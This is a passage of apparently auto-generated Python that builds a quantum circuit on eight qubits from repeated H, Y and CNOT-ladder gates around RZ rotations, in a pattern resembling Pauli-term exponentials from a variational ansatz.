sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.49365, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.49365, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.918651, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.918651, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.918651, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.918651, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.918651, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.918651, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.918651, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.918651, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.591062, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.591062, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.591062, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.591062, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.591062, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.591062, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.591062, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(3.591062, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(5, 1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.456721, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.456721, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.456721, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.456721, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.456721, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.456721, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.456721, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.456721, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.109929, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.109929, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.109929, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.109929, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.109929, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.109929, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.109929, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.109929, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(5, 2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.490813, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.490813, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.490813, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.490813, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.490813, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.490813, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.490813, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.490813, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.631166, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.631166, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.631166, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.631166, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.631166, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(5))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.631166, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.631166, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(5))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.631166, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(5))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(5))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.65175, 2))
